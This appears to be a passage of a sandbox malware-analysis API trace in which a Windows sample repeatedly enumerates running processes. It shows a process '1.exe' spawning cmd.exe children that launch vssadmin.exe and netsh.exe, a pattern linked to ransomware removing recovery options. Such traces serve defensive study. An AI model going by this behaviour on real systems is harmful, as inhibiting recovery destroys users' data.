th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0049.210] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0049.211] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0049.211] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0049.212] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0049.213] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0049.213] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0049.330] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0049.330] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0049.331] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0049.332] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0049.332] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0049.333] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0049.334] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0049.334] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0049.335] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0049.335] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0049.336] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0049.337] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0049.338] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0049.338] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0049.339] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0049.605] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0049.606] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0049.606] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0049.607] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0049.608] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0049.608] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0049.609] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0049.610] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0049.611] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0049.611] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0049.612] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0049.613] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0049.614] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0049.615] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0049.616] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0049.616] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0049.617] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0049.618] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.619] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.620] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0049.620] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0049.621] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.622] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0049.623] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0049.624] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.624] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.625] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0049.626] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.627] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0049.627] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0049.628] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 0 [0049.629] CloseHandle (hObject=0x348) returned 1 [0049.629] Sleep (dwMilliseconds=0x1f4) [0050.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x320 [0050.345] Process32FirstW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0050.346] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0050.347] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0050.347] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.348] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0050.349] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.349] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0050.350] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0050.351] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0050.351] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.352] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0050.352] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0050.353] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.354] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0050.354] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x55, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.355] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.356] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.357] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.357] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.358] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.359] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.359] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.360] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.361] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0050.361] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.362] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.363] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0050.363] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0050.364] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.365] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0050.366] 